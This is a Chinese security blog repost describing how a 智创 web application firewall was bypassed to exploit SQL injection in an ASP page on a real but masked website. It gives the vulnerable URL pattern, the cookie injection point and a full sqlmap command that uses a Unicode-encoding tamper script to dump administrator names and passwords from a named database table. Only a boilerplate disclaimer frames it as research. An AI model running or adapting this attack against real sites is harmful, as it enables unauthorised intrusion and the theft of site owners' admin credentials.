实战绕过智创防火墙sql注入

admin
admin
admin
140350
文章
117
评论
2021年7月25日06:56:48评论112 views字数 760阅读2分32秒阅读模式

实战绕过智创防火墙sql注入


目标站:http://www.xxxxx.com/
http://www.xxxxx.com/shangmao/artmore.asp?id=48514 存在报错型注入,也存在cookie注入

http://www.xxxxx.com/shangmao/artmore.asp?id=48514  后面加个或者“ ‘判断


拿去sqlmap注入,突破注入用tamper脚本下的charunicodeencode.py ,都是编码绕过的,我就用字符串 unicode 编码

Example:   * Input: SELECT FIELD%20FROM TABLE   * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

Requirement:

  • ASP

  • ASP.NET

Tested against:

  • Microsoft SQL Server 2000

  • Microsoft SQL Server 2005

  • MySQL 5.1.56

  • PostgreSQL 9.0.3

sqlmap.py -u http://www.xxxxx.com/shangmao/artmore.asp

 --cookie "id=48514" --level 2 -D hunangyxcb_com_2014 -T applenews_admin_info -C

 "adminname,adminpass" --dump --threads=10  --tamper=charunicodeencode.py -v 


参数慢慢去领悟,,,,,

实战绕过智创防火墙sql注入

实战绕过智创防火墙sql注入




本文始发于微信公众号(飓风网络安全):实战绕过智创防火墙sql注入

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月25日06:56:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战绕过智创防火墙sql注入http://cn-sec.com/archives/358742.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息